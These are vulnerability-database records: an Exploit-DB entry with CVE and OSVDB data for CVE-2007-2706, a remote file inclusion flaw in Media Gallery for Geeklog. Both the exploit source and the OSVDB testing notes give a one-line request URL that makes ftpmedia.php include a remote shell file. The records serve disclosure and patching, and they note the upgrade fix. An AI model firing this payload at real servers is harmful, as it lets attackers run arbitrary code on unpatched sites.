{"id": "EDB-ID:3924", "hash": "51388ae35003ea99f68a538ad4eba2eb", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability", "description": "Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability. CVE-2007-2706. Webapps exploit for php platform", "published": "2007-05-14T00:00:00", "modified": "2007-05-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3924/", "reporter": "ThE TiGeR", "references": [], "cvelist": ["CVE-2007-2706"], "lastseen": "2016-01-31T19:37:25", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2706"]}, {"type": "osvdb", "idList": ["OSVDB:36239"]}], "modified": "2016-01-31T19:37:25"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3924/", "sourceData": "#Media Gallery =>v1.4 Remote file inclusion\n\n#Download script : http://switch.dl.sourceforge.net/sourceforge/mediagallery/mediagallery-1.4.6-1.3.11.tar.gz\n\n#Thanks Str0ke\n\n#Exploit :\n\n#http://victime.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?\n\n#Discovered by ThE TiGeR\n\n#Miro_Tiger100[at]Hotmail[com]\n\n# milw0rm.com [2007-05-14]\n", "osvdbidlist": ["36239"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-10-11T11:07:09", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in maint/ftpmedia.php in Media Gallery 1.4.8a and earlier for Geeklog allows remote attackers to execute arbitrary PHP code via a URL in the _MG_CONF[path_html] parameter.", "modified": "2017-10-10T21:32:20", "published": "2007-05-16T06:19:00", "id": "CVE-2007-2706", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2706", "title": "CVE-2007-2706", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4.8b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Manual Testing Notes\nhttp://[target]/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?\n## References:\n[Secunia Advisory ID:25272](https://secuniaresearch.flexerasoftware.com/advisories/25272/)\nISS X-Force ID: 34294\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3924\nFrSIRT Advisory: ADV-2007-1827\n[CVE-2007-2706](https://vulners.com/cve/CVE-2007-2706)\nBugtraq ID: 23983\n", "modified": "2007-05-14T11:18:50", "published": "2007-05-14T11:18:50", "href": "https://vulners.com/osvdb/OSVDB:36239", "id": "OSVDB:36239", "title": "Media Gallery for Geeklog maint/ftpmedia.php _MG_CONF[path_html] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}